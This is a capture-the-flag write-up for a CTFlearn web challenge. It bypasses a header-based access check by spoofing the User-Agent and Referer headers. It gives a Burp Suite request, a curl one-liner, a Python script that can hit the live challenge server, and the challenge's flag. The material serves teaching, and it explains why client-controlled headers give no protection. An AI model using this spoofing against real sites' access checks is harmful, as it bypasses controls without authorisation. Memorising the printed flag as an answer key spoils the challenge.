Don't Bump Your Head(er).md
Try to bypass my security measure on this site! http://165.227.106.113/header.php
Before we do anything else, let's check the page source. It contains the string:
Sup3rS3cr3tAg3nt
Burp Suite
Let's open Burp Suite and turn on the Proxy with interception enabled.
Then we can visit the website again so that the request shows up under Proxy > HTTP History.
Send the HTTP request to the Repeater by right-clicking it and choosing Send to Repeater (or Ctrl+R).
Now we change the User-Agent header to Sup3rS3cr3tAg3nt, the string found in the page source.
After that, the response tells us the website expects us to arrive from awesomesauce.com.
The Referer HTTP header is what a browser sends to tell the server which page linked to the current request, so we add one pointing at awesomesauce.com. A real browser would send a full URL (for example https://awesomesauce.com/), but this server accepted the bare hostname. Both headers are set entirely by the client, so a server that uses them as an access check can be bypassed by anyone who can edit a request; that is the whole trick here.
HTTP Request

```http
GET /header.php HTTP/1.1
Host: 165.227.106.113
User-Agent: Sup3rS3cr3tAg3nt
Referer: awesomesauce.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
```
We can now send the request and check the Response tab.
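The same bypass scripted, as an added example that is not part of the original writeup. The `gate()` function is a hypothetical stand-in for whatever header.php checks (its messages and the constructed flag it returns are made up here); the header values and the target URL are the ones from the challenge. `fetch()` sends the spoofed request for real and is only called if you uncomment it, so the script runs offline. The equivalent one-liner with curl would be `curl -A 'Sup3rS3cr3tAg3nt' -e 'awesomesauce.com' http://165.227.106.113/header.php`.

```python
"""Header-based access check versus a client that spoofs the headers.

Added example, not code from the writeup or the challenge. The gate
below is a hypothetical model of header.php; nothing here is known to be
the real server logic.
"""
import re
import urllib.request
from typing import Dict, Optional

TARGET_URL = "http://165.227.106.113/header.php"  # from the challenge text
EXPECTED_AGENT = "Sup3rS3cr3tAg3nt"                # hint found in the page source
EXPECTED_SITE = "awesomesauce.com"                 # referring site the server wants
FLAG_RE = re.compile(r"CTFlearn\{[^}]*\}")         # CTFlearn flag format


def gate(headers: Dict[str, str]) -> str:
    """Hypothetical server-side check modelled on the challenge's behaviour.

    Returns the body a client with these request headers would get back.
    Both checks read request headers, which the client controls, so they
    are not a security boundary; anyone who can edit a request passes.
    """
    # HTTP header names are case-insensitive; normalise before lookup.
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("user-agent") != EXPECTED_AGENT:
        return "Rejected: wrong User-Agent"  # constructed message
    # A real browser sends a full URL in Referer; the challenge accepted the
    # bare hostname, so match on substring the way it appears to.
    if EXPECTED_SITE not in h.get("referer", ""):
        return "Rejected: wrong Referer"  # constructed message
    return "Welcome, agent. CTFlearn{constructed_sample}"  # constructed flag, not the real one


def spoofed_headers() -> Dict[str, str]:
    """Headers the client sends to pass the gate; the same edit made in Repeater."""
    return {
        "User-Agent": EXPECTED_AGENT,
        "Referer": EXPECTED_SITE,
        "Accept": "text/html",
        "Connection": "close",
    }


def extract_flag(body: str) -> Optional[str]:
    """Pull the first CTFlearn{...} token out of a response body, if any."""
    m = FLAG_RE.search(body)
    return m.group(0) if m else None


def fetch(url: str = TARGET_URL, headers: Optional[Dict[str, str]] = None,
          timeout: float = 10.0) -> str:
    """Send the spoofed request to the live target (needs network; not run on import)."""
    req = urllib.request.Request(url, headers=headers or spoofed_headers())
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    # An ordinary browser request is refused by the model gate...
    browser = {"User-Agent": "Mozilla/5.0", "Referer": "https://example.com/"}
    print(gate(browser))
    # ...while the spoofed headers sail through.
    print(gate(spoofed_headers()))
    # Uncomment to hit the real challenge and print the flag it returns:
    # print(extract_flag(fetch()))
```

Run it as-is to see the model gate reject a normal browser and accept the spoofed headers; uncomment the last line to reproduce the Repeater request against the live challenge.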
Flag
CTFlearn{did_this_m3ss_with_y0ur_h34d}